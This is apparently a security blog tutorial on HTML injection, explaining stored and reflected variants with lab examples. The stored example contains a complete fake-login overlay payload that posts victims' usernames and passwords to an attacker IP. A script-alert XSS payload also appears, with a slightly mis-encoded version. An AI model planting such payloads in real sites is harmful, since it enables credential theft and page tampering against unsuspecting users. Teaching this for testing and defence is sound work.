Let's talk about HTMl Injection, HTML Injection is a type of issue that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page.
Background concept of HTML Injection
HTML injection is the vulnerability inside any website that occurs when the user input is not correctly sanitized or the output is not encoded and the attacker is able to inject valid HTML code into a vulnerable web page. There are so many techniques which could use element and attributes to submit HTML content. Background concept of HTML Injection
If these methods are provided with untrusted input, then there is a high risk of XSS, specifically an HTML injection one. If strings are not correctly sanitized the problem could lead to XSS based HTML injection.
This vulnerability can have many consequences, like disclosure of a user’s session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims.
Basically you have to find a input parameter either GET based or POST based parameter and if your input reflect back to you there you can execute HTML code and if you succeed to any HTML code on web page, there is a HTMLi
( HTML injection ).
There are two types of html injection as following:
Stored HTML
Reflected HTML
Stored HTML
A stored HTML also was known as Persistence because through this vulnerability the injected malicious script get permanently stored inside the web-server and the application server give out it back to the user when he visits the respective website. Hence when the client will click on payload which appears as an official part of the website, the injected HTML code will get executed by the browser. The most common example is comment option on blogs, which allow the users to POST their comment for the administrator or another user.
Example:
An example of a web application vulnerable to stored HTML injection which allows users to submit their entry in the blog as shown in the screenshot.
Firstly user “bee” had made a normal entry as an attacker which is successfully added in the web server database.
Enter following html code inside the given text area for making HTML attack.
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Please login with valid credentials:<br><form name="login" action="http://192.168.42.238/login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>
Above HTML code will generate a payload to create a user login page on a targeted web page and forward that credential to attacker’s IP.
You can see given below login page looks valid to the user and get stored inside the web server.
Now when the victim will open the malicious login page he will receive above web page which looks official to him and he will submit his credential in that page. As he will do so the request will be forward on attacker IP address.
Check Before Publish
----------------------------------------------------------------
Reflected HTML
The reflected HTML. HTML is also known as Non-Persistence is occurred when the web application responds immediately on user’s input without validating the inputs this lead an attacker to inject browser executable code inside the single HTML response. It’s named as “non-persistent” since the malicious script does not get stored inside the web server, therefore attacker will send the malicious link through phishing to trap the user.
The most common applying of this kind of vulnerability is in Search engines in the website: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities.
Payload value "><script>alert(1)</script>
After inject Payload ( if web is not vulnerable )
Encoded Value %22%3Escript%3Ealert(1)%3C/script%3E
Following web page allow a user to submit his first and last name but these text fields are vulnerable to HTML injection.
Example:
Now type html code in the text field given for the first name which creates a link for hackingtruth.in when you click on “Kumar Atul”
<h1><a href ="http://www.hackingtruth.in">Kumar Atul</a></h1>
Similarly type following code in the given text field for the last name:
<h2>Jaiswal</h2>
Click on Go tab to execute this as first and last name.
From given screenshot, you can see it has submitted KumarAtul Jaiswal and the word “Kumar Atul” contains a link for hackingtruth.in when you will click on the link it will forward to hackingtruth.in
Let's talk about impact of HTMLi :
1) It can allow attacker to modify the page
2) DOM can be Load there
Basically you can execute any HTML form there..
you can execute any HTML redirection method there..or you can load DOM onto the web page or you can use fake login page to hijack user sessions or user credentials thats a possible of HTML injection.
Video Tutorial :- .
Disclaimer
This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal ..!
All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.
All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.
- Hacking Truth by Kumar Atul Jaiswal
I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)